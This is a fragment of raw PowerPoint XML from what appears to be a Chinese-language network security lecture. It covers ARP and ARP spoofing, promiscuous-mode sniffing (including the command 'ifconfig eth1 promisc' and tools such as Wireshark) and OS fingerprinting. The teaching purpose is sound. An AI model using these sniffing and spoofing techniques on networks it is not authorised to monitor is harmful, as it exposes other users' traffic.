              <a:off x="5064547" y="4388693"/>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237.196.7.14</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Line 35"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3756447" y="6500068"/>
              <a:ext cx="2317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Rectangle 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2518197" y="635878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dirty="0">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>237.196.7.88</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rectangle 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3653260" y="342984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A</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Rectangle 7"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3742160" y="592698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B</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3932704032"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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9" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议，实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的查询</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓存（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表），实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的绑定（映射）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48132" name="标题 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址解析协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ARP</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119</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="156690"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900537"/>
            <a:ext cx="5616575" cy="3963988"/>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155" y="3171467"/>
            <a:ext cx="8784825" cy="3457707"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3258270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56689">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wedge">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="156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56689">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wedge">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1566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156690"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wedge">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15669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Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Resources and their Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68611" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1995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6211" name="Object 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="178249" y="1844824"/>
          <a:ext cx="8786239" cy="4680520"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s622963" name="Visio" r:id="rId4" imgW="6436470" imgH="3500769" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId4" imgW="6436470" imgH="3500769" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Picture 2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49" y="1844824"/>
                        <a:ext cx="8786239" cy="4680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4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FB72DFFF-1124-4A97-ACB2-F30B7C034DC1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12080707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606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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议栈指纹</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议栈有标准化定义，但各厂家，如微软和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>RedHat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等，在编写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议栈时做出了不同解释</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>独有特性，被称为“指纹”。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>识别技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主动协议栈指纹识别</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>被动协议栈指纹识别</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19458" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>操作系统识别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120</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="512997283"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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a:t>以太网协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSMA/CD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的安全威胁</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>信道共享方式传送数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络监听</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议（网络层</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>链路层？）的安全威胁</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>​ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓存可能被毒害</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>欺骗（为网络监听服务）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="标题 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>链路层协议的安全威胁</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A14BEF07-BD7B-49AC-8394-8967A3627B43}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>121</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1138981377"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>普通模式：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网卡只接收与自己</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址相同的数据包，并将其传递给操作系统。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>“混杂”模式：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>接收所有经过网卡的数据包，包括不是发给本机的包。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编程设置或通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>库设置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令设置：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ifconfig eth1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>promisc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实施监听</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>手动，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自动抓包，利用工具，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>sniffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163842" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>共享式网络监听原理</a:t>
            </a:r>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pPr/>
              <a:t>122</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4123134019"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>每个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(Host, Router)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>都有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓存邻居的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP-MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址映射表</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt; IP address; MAC address; TTL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> TTL (Time To Live): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>映射地址的失效时间 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>典型为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分钟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自学习建立</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>旁听</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令显示了本机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓存。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C:\&gt;arp -a</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52227" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址解析协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="723900" y="5437673"/>
            <a:ext cx="7696200" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
